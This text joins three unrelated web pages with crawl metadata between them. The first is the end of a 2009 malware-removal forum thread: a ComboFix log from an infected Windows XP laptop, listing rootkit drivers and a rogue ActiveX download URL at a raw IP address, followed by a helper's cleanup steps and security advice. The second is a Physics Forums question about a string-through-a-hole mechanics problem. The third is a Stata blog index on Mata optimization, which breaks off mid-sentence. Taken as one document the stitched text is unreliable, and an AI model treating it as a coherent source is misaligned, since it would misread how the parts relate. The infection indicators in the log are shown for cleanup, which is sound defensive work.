c:\windows\system32\UACwflcallyfcaghsrnp.dll Infected copy of c:\windows\system32\mspmsnsv.dll was found and disinfected Restored copy from - c:\windows\system32\dllcache\mspmsnsv.dll . ((((((((((((((((((((((((((((((((((((((( Drivers/Services ))))))))))))))))))))))))))))))))))))))))))))))))) . -------\Service_hjgruiravowvei -------\Legacy_hjgruiravowvei -------\Service_UACd.sys -------\Legacy_UACd.sys ((((((((((((((((((((((((( Files Created from 2009-07-19 to 2009-08-19 ))))))))))))))))))))))))))))))) . 2009-08-19 18:36 . 2009-08-19 18:39 -------- d-----w- c:\windows\LastGood 2009-08-19 18:02 . 2009-08-19 18:02 -------- d-sh--w- C:\found.000 2009-08-18 14:45 . 2009-08-18 14:45 -------- d-----w- c:\program files\SonicWallES 2009-08-17 19:26 . 2009-08-17 19:27 4212 ---ha-w- c:\windows\system32\zllictbl.dat 2009-08-16 19:33 . 
2009-08-16 19:33 64 ----a-w- c:\documents and settings\Peterson\Application Data\Mozilla\Firefox\Profiles\6ehew45v.default\extensions\[email protected] 2009-08-12 19:34 . 2009-08-19 17:29 -------- d-----w- c:\documents and settings\Peterson\Application Data\vlc 2009-08-12 18:16 . 2009-08-12 18:16 -------- d-----w- c:\program files\Mozilla ActiveX Control v1.7.12 2009-08-12 18:14 . 2009-08-17 18:25 -------- d-----w- c:\program files\Graboid 2009-08-09 20:15 . 2009-08-09 20:15 70656 ----a-w- c:\windows\system32\drivers\iymsbpctccdxbvrn.sys 2009-08-04 21:15 . 2009-08-05 03:31 -------- d-----w- c:\program files\SpyZooka 2009-08-04 20:29 . 2009-08-14 09:49 -------- d-----w- c:\program files\spmfby 2009-07-24 19:28 . 2009-07-24 19:28 -------- d-----w- c:\documents and settings\Peterson\Local Settings\Application Data\Mozilla 2009-07-24 02:12 . 2009-07-24 02:12 -------- d-----w- c:\program files\VideoLAN . (((((((((((((((((((((((((((((((((((((((( Find3M Report )))))))))))))))))))))))))))))))))))))))))))))))))))) . 2009-08-19 01:30 . 2009-04-12 01:11 -------- d-----w- c:\program files\PeerGuardian2 2009-08-18 18:56 . 2006-07-31 21:04 -------- d-----w- c:\program files\Windows Defender 2009-08-17 23:49 . 2009-07-18 15:58 -------- d-----w- c:\program files\Trend Micro 2009-08-17 18:34 . 2007-07-09 21:19 -------- d-----w- c:\program files\Spyware Doctor 2009-08-17 18:33 . 2006-11-27 02:42 -------- d---a-w- c:\docume~1\ALLUSE~1\APPLIC~1\TEMP 2009-08-17 18:32 . 2005-12-19 18:41 -------- d-----w- c:\docume~1\ALLUSE~1\APPLIC~1\McAfee 2009-08-17 18:32 . 2005-12-19 18:41 -------- d-----w- c:\program files\McAfee 2009-08-17 18:25 . 2009-03-08 18:54 -------- d-----w- c:\program files\Spybot - Search & Destroy 2009-08-17 18:24 . 2009-03-08 18:54 -------- dc----w- c:\docume~1\ALLUSE~1\APPLIC~1\Spybot - Search & Destroy 2009-08-17 18:15 . 2007-09-02 04:02 -------- d-----w- c:\program files\uTorrent 2009-08-17 18:15 . 2006-07-31 17:32 -------- d-----w- c:\documents and settings\Peterson\Application Data\uTorrent 2009-08-16 22:49 . 2006-06-18 16:57 3766 --sha-w- c:\windows\system32\KGyGaAvL.sys 2009-08-16 22:49 . 2006-06-18 16:57 56 --sh--r- c:\windows\system32\4FF8E3934A.sys 2009-08-16 19:33 . 2008-09-27 14:45 -------- d-----w- c:\program files\Common Files\DVDVideoSoft 2009-08-11 11:54 . 2009-07-16 22:08 -------- d-----w- c:\documents and settings\LocalService\Application Data\SACore 2009-07-18 01:01 . 2009-07-18 01:01 -------- d-----w- c:\program files\Alwil Software 2009-07-18 00:48 . 2009-07-18 00:48 -------- d-----w- c:\windows\system32\config\systemprofile\Application Data\SACore 2009-07-16 22:22 . 2009-07-05 00:59 -------- d-----w- c:\program files\Image-Line 2009-07-16 22:14 . 2005-12-26 16:35 -------- d-----w- c:\program files\Microsoft AntiSpyware 2009-07-16 22:13 . 2009-01-07 04:51 -------- d-----w- c:\documents and settings\Peterson\Application Data\Move Networks 2009-07-16 22:05 . 2009-07-14 01:19 -------- dc----w- c:\docume~1\ALLUSE~1\APPLIC~1\Lavasoft 2009-07-16 19:30 . 2009-07-16 19:30 -------- d-----w- c:\documents and settings\NetworkService\Application Data\SACore 2009-07-16 19:25 . 2009-07-16 19:25 -------- dc----w- c:\docume~1\ALLUSE~1\APPLIC~1\SiteAdvisor 2009-07-16 18:52 . 2008-07-28 03:32 -------- dc----w- c:\docume~1\ALLUSE~1\APPLIC~1\avg8 2009-07-14 20:43 . 2005-12-19 18:09 94208 ----a-w- c:\windows\DUMP7714.tmp 2009-07-13 19:30 . 2009-07-13 19:27 -------- d-----w- c:\program files\RegCleaner 2009-07-13 18:59 . 2009-07-13 18:59 164 ----a-w- c:\windows\install.dat 2009-07-13 03:16 . 
2009-07-13 03:16 -------- dc----w- c:\docume~1\ALLUSE~1\APPLIC~1\{2BAE6915-8510-4B9F-B498-02DA86258AA0} 2009-07-12 21:34 . 2009-07-12 21:34 -------- d-----w- c:\program files\Common Files\Wise Installation Wizard 2009-07-12 19:20 . 2009-07-12 18:42 -------- dc----w- c:\docume~1\ALLUSE~1\APPLIC~1\12483594 2009-07-12 18:53 . 2009-05-22 14:25 -------- d-----w- c:\program files\Microsoft Silverlight 2009-07-09 21:20 . 2009-07-05 01:02 -------- d-----w- c:\program files\VstPlugins 2009-07-05 01:01 . 2009-07-05 01:01 -------- d-----w- c:\program files\Outsim 2009-06-23 20:45 . 2009-06-23 20:45 -------- dc----w- c:\docume~1\ALLUSE~1\APPLIC~1\AGI 2009-05-27 23:29 . 2009-05-27 23:29 97144 ----a-w- c:\documents and settings\Peterson\Application Data\Move Networks\ie_bin\MovePlayerUpgrade.exe . . . *Note* empty entries & legit default entries are not shown REGEDIT4 [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "MSMSGS"="c:\program files\Messenger\msmsgs.exe" [2004-10-13 1694208] "DellSupport"="c:\program files\DellSupport\DSAgnt.exe" [2007-03-15 460784] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "Apoint"="c:\program files\Apoint\Apoint.exe" [2004-09-13 155648] "IntelWireless"="c:\program files\Intel\Wireless\Bin\ifrmewrk.exe" [2004-10-30 385024] "ATIPTA"="c:\program files\ATI Technologies\ATI Control Panel\atiptaxx.exe" [2005-08-06 344064] "PCMService"="c:\program files\Dell\Media Experience\PCMService.exe" [2004-04-12 290816] "RealTray"="c:\program files\Real\RealPlayer\RealPlay.exe" [2005-12-19 26112] "dla"="c:\windows\system32\dla\tfswctrl.exe" [2005-05-31 122941] "MSKDetectorExe"="c:\program files\McAfee\SpamKiller\MSKDetct.exe" [2006-11-07 1121280] "dscactivate"="c:\program files\Dell Support Center\gs_agent\custom\dsca.exe" [2007-11-15 16384] "CloneDVDElbyDelay"="c:\program files\Elaborate Bytes\CloneDVD\ElbyCheck.exe" [2002-11-02 45056] "CanonMyPrinter"="c:\program files\Canon\MyPrinter\BJMyPrt.exe" [2007-09-14 1603152] "AppleSyncNotifier"="c:\program files\Common Files\Apple\Mobile Device Support\bin\AppleSyncNotifier.exe" [2008-10-01 111936] "iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2009-04-02 342312] "ISUSPM Startup"="c:\program files\Common Files\InstallShield\UpdateService\isuspm.exe" [2005-06-10 249856] c:\docume~1\ALLUSE~1\STARTM~1\Programs\Startup\ Digital Line Detect.lnk - c:\program files\Digital Line Detect\DLG.exe [2005-12-19 24576] Microsoft Office.lnk - c:\program files\Microsoft Office\Office\OSA9.EXE [1999-2-17 65588] [HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\IntelWireless] 2004-09-07 22:08 110592 ----a-w- c:\program files\Intel\Wireless\Bin\LgNotify.dll [HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager] BootExecute REG_MULTI_SZ autocheck autochk *\0\0lsdelete @="" [HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List] "%windir%\\system32\\sessmgr.exe"= "c:\\Program Files\\Common Files\\AOL\\1147898130\\ee\\aolsoftware.exe"= "c:\\Program Files\\Common Files\\AOL\\1147898130\\ee\\aim6.exe"= "c:\\Program Files\\AIM95\\aim.exe"= "c:\\Program Files\\AIM6\\aim6.exe"= "%windir%\\Network Diagnostic\\xpnetdiag.exe"= "c:\\Program Files\\Deusty\\Mojo\\Mojo.exe"= "c:\\Program Files\\iTunes\\iTunes.exe"= R1 aswSP;avast! 
Self Protection;c:\windows\system32\drivers\aswSP.sys [7/17/2009 9:02 PM 114768] R2 aswFsBlk;aswFsBlk;c:\windows\system32\drivers\aswFsBlk.sys [7/17/2009 9:02 PM 20560] R2 Viewpoint Manager Service;Viewpoint Manager Service;c:\program files\Viewpoint\Common\ViewpointService.exe [2/15/2007 8:58 AM 24652] . - - - - ORPHANS REMOVED - - - - URLSearchHooks-{0BC6E3FA-78EF-4886-842C-5A1258C4455A} - (no file) BHO-{A3BC75A2-1F87-4686-AA43-5347D756017C} - (no file) Toolbar-{CCC7A320-B3CA-4199-B1A6-9F516DD69829} - (no file) WebBrowser-{CCC7A320-B3CA-4199-B1A6-9F516DD69829} - (no file) HKCU-Run-Aim6 - (no file) Notify-khfEXnNG - khfEXnNG.dll SafeBoot-mcmscsvc SafeBoot-MCODS . ------- Supplementary Scan ------- . uStart Page = hxxp://baseball.fantasysports.yahoo.com/b1/258902 uInternet Connection Wizard,ShellNext = hxxp://www.dell4me.com/mywaybiz IE: E&xport to Microsoft Excel - c:\progra~1\MICROS~2\OFFICE11\EXCEL.EXE/3000 DPF: {2E28242B-A689-11D4-80F2-0040266CBB8D} - hxxp://125.206.34.118/cgi-bin/kxhcm10.ocx FF - ProfilePath - c:\docume~1\Peterson\APPLIC~1\Mozilla\Firefox\Profiles\6ehew45v.default\ FF - prefs.js: browser.startup.homepage - hxxp://baseball.fantasysports.yahoo.com/b1/258902 FF - plugin: c:\program files\Viewpoint\Viewpoint Media Player\npViewpoint.dll ---- FIREFOX POLICIES ---- c:\program files\Mozilla Firefox\greprefs\all.js - pref("media.enforce_same_site_origin", false); c:\program files\Mozilla Firefox\greprefs\all.js - pref("media.cache_size", 51200); c:\program files\Mozilla Firefox\greprefs\all.js - pref("media.ogg.enabled", true); c:\program files\Mozilla Firefox\greprefs\all.js - pref("media.wave.enabled", true); c:\program files\Mozilla Firefox\greprefs\all.js - pref("media.autoplay.enabled", true); c:\program files\Mozilla Firefox\greprefs\all.js - pref("browser.urlbar.autocomplete.enabled", true); c:\program files\Mozilla Firefox\greprefs\all.js - pref("capability.policy.mailnews.*.wholeText", "noAccess"); c:\program files\Mozilla Firefox\greprefs\all.js - pref("dom.storage.default_quota", 5120); c:\program files\Mozilla Firefox\greprefs\all.js - pref("content.sink.event_probe_rate", 3); c:\program files\Mozilla Firefox\greprefs\all.js - pref("network.http.prompt-temp-redirect", true); c:\program files\Mozilla Firefox\greprefs\all.js - pref("layout.css.dpi", -1); c:\program files\Mozilla Firefox\greprefs\all.js - pref("layout.css.devPixelsPerPx", -1); c:\program files\Mozilla Firefox\greprefs\all.js - pref("gestures.enable_single_finger_input", true); c:\program files\Mozilla Firefox\greprefs\all.js - pref("dom.max_chrome_script_run_time", 0); c:\program files\Mozilla Firefox\greprefs\all.js - pref("network.tcp.sendbuffer", 131072); c:\program files\Mozilla Firefox\greprefs\all.js - pref("geo.enabled", true); c:\program files\Mozilla Firefox\greprefs\security-prefs.js - pref("security.remember_cert_checkbox_default_setting", true); c:\program files\Mozilla Firefox\defaults\pref\firefox-branding.js - pref("browser.search.param.yahoo-fr", "moz35"); c:\program files\Mozilla Firefox\defaults\pref\firefox-branding.js - pref("browser.search.param.yahoo-fr-cjkt", "moz35"); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("extensions.blocklist.level", 2); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("browser.urlbar.restrict.typed", "~"); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("browser.urlbar.default.behavior", 0); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("privacy.clearOnShutdown.history", true); 
c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("privacy.clearOnShutdown.formdata", true); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("privacy.clearOnShutdown.passwords", false); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("privacy.clearOnShutdown.cookies", true); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("privacy.clearOnShutdown.cache", true); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("privacy.clearOnShutdown.sessions", true); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("privacy.clearOnShutdown.offlineApps", false); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("privacy.clearOnShutdown.siteSettings", false); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("privacy.cpd.history", true); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("privacy.cpd.formdata", true); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("privacy.cpd.passwords", false); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("privacy.cpd.cookies", true); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("privacy.cpd.cache", true); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("privacy.cpd.sessions", true); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("privacy.cpd.offlineApps", false); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("privacy.cpd.siteSettings", false); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("privacy.sanitize.migrateFx3Prefs", false); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("browser.ssl_override_behavior", 2); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("security.alternate_certificate_error_page", "certerror"); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("browser.privatebrowsing.autostart", false); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("browser.privatebrowsing.dont_prompt_on_enter", false); c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("geo.wifi.uri", "https://www.google.com/loc/json"); . ************************************************************************** catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net Rootkit scan 2009-08-19 14:43 Windows 5.1.2600 Service Pack 2 NTFS scanning hidden processes ... scanning hidden autostart entries ... scanning hidden files ... scan completed successfully hidden files: 0 ************************************************************************** . --------------------- DLLs Loaded Under Running Processes --------------------- - - - - - - - > 'winlogon.exe'(992) c:\windows\system32\Ati2evxx.dll c:\program files\Intel\Wireless\Bin\LgNotify.dll - - - - - - - > 'explorer.exe'(1172) c:\windows\system32\WPDShServiceObj.dll c:\windows\system32\PortableDeviceTypes.dll c:\windows\system32\PortableDeviceApi.dll . ------------------------ Other Running Processes ------------------------ . 
c:\windows\system32\ati2evxx.exe c:\program files\Intel\Wireless\Bin\EvtEng.exe c:\program files\Intel\Wireless\Bin\S24EvMon.exe c:\program files\Intel\Wireless\Bin\WLKEEPER.exe c:\program files\Alwil Software\Avast4\aswUpdSv.exe c:\program files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe c:\program files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE c:\program files\Dell\NicConfigSvc\NicConfigSvc.exe c:\program files\Intel\Wireless\Bin\RegSrvc.exe c:\program files\Windows Media Player\wmpnetwk.exe c:\program files\Viewpoint\Viewpoint Manager\ViewMgr.exe c:\program files\Intel\Wireless\Bin\ZCfgSvc.exe c:\windows\system32\ati2evxx.exe c:\windows\system32\wscntfy.exe c:\progra~1\Intel\Wireless\Bin\1XConfig.exe c:\program files\Apoint\ApntEx.exe c:\program files\iPod\bin\iPodService.exe c:\program files\Java\jre1.6.0_02\bin\jucheck.exe . ************************************************************************** . Completion time: 2009-08-19 14:51 - machine was rebooted ComboFix-quarantined-files.txt 2009-08-19 18:50 Pre-Run: 7,953,272,832 bytes free Post-Run: 17,027,739,648 bytes free WindowsXP-KB310994-SP2-Home-BootDisk-ENU.exe timeout=2 default=multi(0)disk(0)rdisk(0)partition(2)\WINDOWS [operating systems] c:\cmdcons\BOOTSECT.DAT="Microsoft Windows Recovery Console" /cmdcons multi(0)disk(0)rdisk(0)partition(2)\WINDOWS="Microsoft Windows XP Home Edition" /noexecute=optin /fastdetect 276 --- E O F --- 2008-07-10 07:01 ### #6 Buckeye_Sam Buckeye_Sam Malware Expert • Members • 17,382 posts • OFFLINE • • Gender:Male • Location:Pickerington, Ohio • Local time:11:24 PM Posted 20 August 2009 - 08:40 AM Looks much better! Please visit the online Jotti Virus Scanner • Click on Browse button. • Navigate to the following file and upload it. c:\windows\system32\drivers\iymsbpctccdxbvrn.sys • Click on the button. The scanner will check the file with various AV companies. • Copy and paste the results box into a reply to this thread. If Jotti's too busy, try here: Go here: http://www.virustotal.com/en/virustotalf.html ================= If you have a previous version of MBAM, remove it via Add/Remove Programs and download a fresh copy. • Make sure you are connected to the Internet. • Double-click on mbam-setup.exe to install the application. • When the installation begins, follow the prompts and do not make any changes to default settings. • When installation has finished, make sure you leave both of these checked: • Update Malwarebytes' Anti-Malware • Launch Malwarebytes' Anti-Malware • Then click Finish. MBAM will automatically start and you will be asked to update the program before performing a scan. • If an update is found, the program will automatically update itself. • Press the OK button to close that box and continue. • If you encounter any problems while downloading the updates, manually download them from here and just double-click on mbam-rules.exe to install. Alternatively, you can update through MBAM's interface from a clean computer, copy the definitions (rules.ref) located in C:\Documents and Settings\All Users\Application Data\Malwarebytes\Malwarebytes' Anti-Malware from that system to a usb stick or CD and then copy it to the infected machine. On the Scanner tab: • Make sure the "Perform Quick Scan" option is selected. • Then click on the Scan button. • If asked to select the drives to scan, leave all the drives selected and click on the Start Scan button. • The scan will begin and "Scan in progress" will show at the top. 
It may take some time to complete so please be patient. • When the scan is finished, a message box will say "The scan completed successfully. Click 'Show Results' to display all objects found". • Click OK to close the message box and continue with the removal process. Back at the main Scanner screen: • Click on the Show Results button to see a list of any malware that was found. • Make sure that everything is checked, and click Remove Selected. • When removal is completed, a log report will open in Notepad. • The log is automatically saved and can be viewed by clicking the Logs tab in MBAM. • Copy and paste the contents of that report in your next reply and exit MBAM. Note: If MBAM encounters a file that is difficult to remove, you may be asked to reboot your computer so it can proceed with the disinfection process. Regardless if prompted to restart the computer or not, please do so immediately. Failure to reboot normally (not into safe mode) will prevent MBAM from removing all the malware. MBAM may "make changes to your registry" as part of its disinfection routine. If using other security programs that detect registry changes (ie Spybot's Teatimer), they may interfere or alert you after scanning with MBAM. Please temporarily disable such programs or permit them to allow the changes. If I have helped you in any way, please consider a donation to help me continue the fight against malware. Failing to respond back to the person that is giving up their own time to help you not only is insensitive and disrespectful, but it guarantees that you will never receive help from me again. Please thank your helpers and there will always be help here when you need it! ======================================================== ### #7 peterocks peterocks • Topic Starter • Members • 8 posts • OFFLINE • • Local time:12:24 AM Posted 20 August 2009 - 10:13 AM Thank you I have noticed a great improvement in the computer's functioning. The Jotti Virus Scan came back clean for all scans. Here is the log of the Malwarebytes scan: Malwarebytes' Anti-Malware 1.40 Database version: 2664 Windows 5.1.2600 Service Pack 2 8/20/2009 11:02:26 AM mbam-log-2009-08-20 (11-02-26).txt Scan type: Quick Scan Objects scanned: 102844 Time elapsed: 6 minute(s), 28 second(s) Memory Processes Infected: 0 Memory Modules Infected: 0 Registry Keys Infected: 3 Registry Values Infected: 0 Registry Data Items Infected: 0 Folders Infected: 1 Files Infected: 1 Memory Processes Infected: (No malicious items detected) Memory Modules Infected: (No malicious items detected) Registry Keys Infected: HKEY_CLASSES_ROOT\qndsfmao.bvqe (Trojan.FakeAlert) -> Quarantined and deleted successfully. HKEY_CLASSES_ROOT\qndsfmao.toolbar.1 (Trojan.FakeAlert) -> Quarantined and deleted successfully. Registry Values Infected: (No malicious items detected) Registry Data Items Infected: (No malicious items detected) Folders Infected: C:\Documents and Settings\All Users\Application Data\12483594 (Rogue.Multiple) -> Quarantined and deleted successfully. Files Infected: C:\Documents and Settings\All Users\Application Data\12483594\12483594 (Rogue.Multiple) -> Quarantined and deleted successfully. ### #8 Buckeye_Sam Buckeye_Sam Malware Expert • Members • 17,382 posts • OFFLINE • • Gender:Male • Location:Pickerington, Ohio • Local time:11:24 PM Posted 21 August 2009 - 11:15 AM Sounds good! As long as everything appears to be running smoothly again I'll post some final steps and recommendations for you. We need to remove Combofix now that we're done with it. 
• Click START then RUN • Now type Combofix /u in the runbox and click OK ================== Now that you are clean, please follow these simple steps in order to keep your computer clean and secure: • Disable and Enable System Restore. - If you are using Windows ME or XP then you should disable and re-enable System Restore to make sure there are no infected files left in a restore point from what we have just cleaned. You can find instructions on how to disable and re-enable System Restore here: Windows XP System Restore Guide. Re-enable System Restore using the instructions from the tutorial above. • Use an AntiVirus Software - It is very important that your computer has anti-virus software running on your machine. This alone can save you a lot of trouble with malware in the future. See this link for a listing of some online and stand-alone antivirus programs: Virus, Spyware, and Malware Protection and Removal Resources • Update your AntiVirus Software - It is imperative that you update your antivirus software at least once a week (even more often if you wish). If you do not update your antivirus software, it will not be able to catch any of the new variants that may come out. • Use a Firewall - I cannot stress how important it is that you use a firewall on your computer. Without a firewall your computer is susceptible to being hacked and taken over. I am very serious about this and see it happen almost every day with my clients. Simply using a firewall in its default configuration can lower your risk greatly. For a tutorial on firewalls and a listing of some available ones see the link below: Understanding and Using Firewalls • Visit Microsoft's Windows Update Site Frequently - It is important that you visit http://www.windowsupdate.com regularly. This will ensure your computer always has the latest security updates installed. If there are new updates to install, install them immediately, reboot your computer, and revisit the site until there are no more critical updates. • Install Spybot - Search and Destroy - Download and install Spybot - Search and Destroy with its TeaTimer option. This will provide real-time spyware and hijacker protection on your computer alongside your virus protection. You should also scan your computer with this program on a regular basis, just as you would with antivirus software. A tutorial on installing and using this product can be found here: Using Spybot - Search & Destroy to remove Spyware, Malware, and Hijackers • Install SpywareBlaster - SpywareBlaster will add a large list of programs and sites to your Internet Explorer settings that will protect you from running and downloading known malicious programs. A tutorial on installing and using this product can be found here: Using SpywareBlaster to protect your computer from Spyware and Malware • Update all these programs regularly - Make sure you update all the programs I have listed regularly. Without regular updates you WILL NOT be protected when new malicious programs are released. Follow this list and your potential for being infected again will reduce dramatically. If I have helped you in any way, please consider a donation to help me continue the fight against malware. Failing to respond back to the person that is giving up their own time to help you not only is insensitive and disrespectful, but it guarantees that you will never receive help from me again. Please thank your helpers and there will always be help here when you need it!
======================================================== ### #9 peterocks peterocks • Topic Starter • Members • 8 posts • OFFLINE • • Local time:12:24 AM Posted 21 August 2009 - 12:00 PM I have followed all of your steps and I'm working on updating and scanning. Thank you for everything. It helps so much being able to bring a clean computer back to school and not having to worry about it crashing while I'm typing a paper! I will be donating through your Paypal as a token of my appreciation. Thanks again. ### #10 Buckeye_Sam Buckeye_Sam Malware Expert • Members • 17,382 posts • OFFLINE • • Gender:Male • Location:Pickerington, Ohio • Local time:11:24 PM Posted 21 August 2009 - 01:00 PM If I have helped you in any way, please consider a donation to help me continue the fight against malware. Failing to respond back to the person that is giving up their own time to help you not only is insensitive and disrespectful, but it guarantees that you will never receive help from me again. Please thank your helpers and there will always be help here when you need it! ========================================================
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8819501399993896, "perplexity": 29916.473013905783}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-34/segments/1534221209856.3/warc/CC-MAIN-20180815024253-20180815044253-00620.warc.gz"}
https://www.physicsforums.com/threads/self-studier-w-kleppner-kolenkow-question.404135/
# Self-studier w/ kleppner & kolenkow question 1. May 18, 2010 ### pton265 Hi, This is my first post. I'm reviewing mechanics out of K&K and have a question about problem 4.5: "Mass m whirls on a frictionless table, held to a circular motion by a string which passes through a hole in the table. The string is slowly pulled through the hole so that the radius of the circle changes from l1 to l2. Show that the work done in pulling the string equals the increase in kinetic energy of the mass." I'm assuming the mass starts with uniform circular motion at radius l1, and I analyze in polar coordinates with the center of this circle as the origin. My initial intuition about the motion: (1) Angular acceleration is non-zero (positive), but there cannot be a $$\hat{\theta}$$ component of acceleration (the force is always radial) - which is only true if $$2\dot{r}\dot{\theta} = -r\ddot{\theta}$$. (2) The only way for the string to do work (increase the magnitude of m's velocity) is if m's trajectory (and, therefore, velocity) has some radial component. That is, the force must at some point have a non-orthogonal component with respect to the trajectory. Since the force is everywhere radial, the $$\hat{\theta}$$ component of velocity is unchanged, while the radial component of velocity increases (in the negative $$\hat{r}$$ direction). This statement does not contradict (1), where I state angular acceleration is non-zero (right?!). Physically, all of this corresponds to the mass breaking from uniform circular motion and spiraling inward toward the center of the table (i.e. where the hole is). When it reaches l2, it will NOT be in uniform circular motion because its velocity must have some radial component (inward). Now, the only solution (http://hep.ucsb.edu/courses/ph21/problems/p7sol.pdf [Broken]) I've found takes (1) to be true, but (2) to be false. The final velocity in the solution has a magnitude such that the velocity cannot possibly have a radial component. In other words, once the mass reaches l2, it pops back into uniform circular motion (albeit with higher velocity). How can the trajectory take this form (i.e. that of consecutively smaller concentric circles)? Is the solution wrong? If not, where is my error? Please bear in mind that the only assumed knowledge at this point is of translational motion, linear momentum, and the work-energy theorem in one dimension (KK chs. 1-4) - not angular momentum, rotational motion, etc. My apologies if there is already a similar thread - I've searched PF pretty thoroughly. Thanks very much for any and all help... L Last edited by a moderator: May 4, 2017
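Sketch of the standard resolution (added for context; the thread above has no replies in this capture, and the argument below leans on conservation of angular momentum, which goes beyond the chapters 1-4 toolkit the poster wants to stick to). Because the string is pulled slowly, the motion stays nearly circular at every instant, so the small inward radial velocity is negligible at the endpoints; it is needed only so that the radial tension can do work along the way. The tension exerts no torque about the hole, so $$L = m r^2 \dot{\theta} = m r v_\theta$$ is constant; the tangential speed is therefore not unchanged but grows as $$v_\theta = \frac{L}{mr}.$$ For a nearly circular orbit of radius r the tension is $$T = \frac{m v_\theta^2}{r} = \frac{L^2}{m r^3},$$ and the work done by the agent pulling the string in from l1 to l2 is $$W = \int_{l_2}^{l_1} \frac{L^2}{m r^3}\,dr = \frac{L^2}{2m}\left(\frac{1}{l_2^2} - \frac{1}{l_1^2}\right) = \tfrac{1}{2} m v_2^2 - \tfrac{1}{2} m v_1^2,$$ which is exactly the increase in kinetic energy, consistent with the linked solution.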
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9383972883224487, "perplexity": 647.587669843904}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-34/segments/1502886124662.41/warc/CC-MAIN-20170823225412-20170824005412-00255.warc.gz"}
https://blog.stata.com/tag/optimization/
### Archive Posts Tagged ‘optimization’ ## Programming an estimation command in Stata: Using optimize() to estimate Poisson parameters $$\newcommand{\xb}{{\bf x}} \newcommand{\betab}{\boldsymbol{\beta}}$$I show how to use optimize() in Mata to maximize a Poisson log-likelihood function and to obtain estimators of the variance–covariance of the estimator (VCE) based on independent and identically distributed (IID) observations or on robust methods. This is the eighteenth post in the series Programming an estimation command in Stata. I recommend that you start at the beginning. See Programming an estimation command in Stata: A map to posted entries for a map to all the posts in this series. Using optimize() There are many optional choices that one may make when solving a nonlinear optimization problem, but there are very few that one must make. The optimize*() functions in Mata handle this problem by making a set of default choices for you, requiring that you specify a few things, and allowing you to change any of the default choices. When I use optimize() to solve a Read more… Categories: Programming Tags: ## Programming an estimation command in Stata: A review of nonlinear optimization using Mata $$\newcommand{\betab}{\boldsymbol{\beta}} \newcommand{\xb}{{\bf x}} \newcommand{\yb}{{\bf y}} \newcommand{\gb}{{\bf g}} \newcommand{\Hb}{{\bf H}} \newcommand{\thetab}{\boldsymbol{\theta}} \newcommand{\Xb}{{\bf X}}$$I review the theory behind nonlinear optimization and get more practice in Mata programming by implementing an optimizer in Mata. In real problems, I recommend using the optimize() function or moptimize() function instead of the one I describe here. In subsequent posts, I will discuss optimize() and moptimize(). This post will help you develop your Mata programming skills and will improve your understanding of how optimize() and moptimize() work. This is the seventeenth post in the series Programming an estimation command in 